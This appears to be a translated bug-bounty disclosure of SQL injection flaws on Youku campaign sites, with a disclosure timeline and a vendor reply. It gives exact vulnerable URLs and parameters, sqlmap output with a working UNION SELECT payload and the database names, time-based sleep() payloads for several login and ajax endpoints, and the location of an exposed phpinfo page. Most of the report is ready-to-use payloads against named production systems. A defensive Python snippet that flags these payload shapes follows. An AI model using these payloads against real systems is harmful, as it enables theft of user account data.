2014-03-01: Details reported to the vendor, awaiting vendor response
2014-03-01: Vendor confirmed; details disclosed to the vendor only
2014-03-11: Details disclosed to core white-hats and relevant domain experts
2014-03-21: Details disclosed to ordinary white-hats
2014-03-31: Details disclosed to intern white-hats
2014-04-15: Details disclosed to the public
SQL injection on a Youku campaign site leaks the account information of a large number of users who took part in the campaigns. == That's what you get for chasing freebies
Injection point: events.youku.com/2011/pepsihappyness/api/?act=my_ecards&page=1&pagesize=4&pageslists=%23ecards_pageslists&pagesturn=%23ecards_pagesturn&url=api/%3Fact%3Dmy_ecards%26uid%3D34853&uid=1
Injected parameter: uid
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: act=my_ecards&page=1&pagesize=4&pageslists=#ecards_pageslists&pagesturn=#ecards_pagesturn&url=api/?act=my_ecards&uid=34853&uid=1 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,121,107,58),CHAR(85,73,87,75,89,104,111,105,87,85),CHAR(58,114,106,121,58)), NULL, NULL#
---
available databases [3]:
[*] db_events
[*] information_schema
[*] test

Database: db_events [233 tables]
Heh, there are a few more POST injection points as well; the usual tools can't extract results from them, but a time delay confirms they exist.

http://events.youku.com/bwnzb/api/_login.php
uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e

http://events.youku.com/bwnzb/phase-2/api/_login.php
uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e

http://events.youku.com/familymart/api/?q=ajax/doSupport
type=(select(sleep(3))v)&work_id=24526
or: type=test&work_id=(select(sleep(3))v)

As a bonus, a phpinfo page: http://events.youku.com/2010/wtcc/phpinfo.php
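As an added example that is not part of the original report, here is a small Python request classifier a defender could run over access logs or a WAF feed to flag the three payload shapes reported above (UNION SELECT with CONCAT/CHAR in a query parameter, a comment-bracketed XOR/OR with sleep() in a login POST body, and a bare sleep() inside a form field). The sample requests are constructed to mirror those shapes and are not captured traffic; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample requests (method, path, body) modelled on the payload
# shapes in this report; they are not captured traffic.
SAMPLE_REQUESTS = [
    ("GET", "/2011/pepsihappyness/api/?act=my_ecards&page=1&uid=1 UNION ALL SELECT "
            "NULL,NULL,CONCAT(CHAR(58,99,121,107,58)),NULL#", ""),
    ("POST", "/bwnzb/api/_login.php",
     "uname=/*'XOR(if(now()%3dsysdate()%2csleep(1)%2c0))OR'*/&upass=e"),
    ("POST", "/familymart/api/?q=ajax/doSupport", "type=(select(sleep(3))v)&work_id=24526"),
    ("GET", "/2011/pepsihappyness/api/?act=my_ecards&uid=34853", ""),   # benign
    ("POST", "/bwnzb/api/_login.php", "uname=alice&upass=hunter2"),     # benign
]

# Each rule is (name, pattern); patterns run against the decoded, lower-cased value.
RULES = [
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("time-delay", re.compile(r"\bsleep\s*\(\s*\d+\s*\)")),
    ("comment-bracketed-boolean", re.compile(r"/\*.*\b(xor|or|and)\b.*\*/")),
    ("char-concat", re.compile(r"\bconcat\s*\(\s*char\s*\(")),
]


def decode(value):
    # URL-decode twice so double-encoded payloads (%253d -> %3d -> =) are caught,
    # then normalise case so keyword matching is case-insensitive.
    return unquote_plus(unquote_plus(value)).lower()


def classify(method, path, body):
    """Return the sorted rule names triggered by any query or body parameter."""
    query = path.partition("?")[2]
    hits = set()
    for raw in (query, body):
        for pair in raw.split("&"):
            value = decode(pair.partition("=")[2])
            for name, pattern in RULES:
                if pattern.search(value):
                    hits.add(name)
    return sorted(hits)


def scan(requests=SAMPLE_REQUESTS):
    """Classify every request; benign ones come back with an empty hit list."""
    return [(path, classify(method, path, body)) for method, path, body in requests]
```

Only the three malicious samples produce hits; the two benign requests to the same endpoints are left alone, which is the check to keep when tuning such rules against real traffic.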
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-03-01 20:08
Vendor response: Thanks for the heads-up, we'll fix it right away.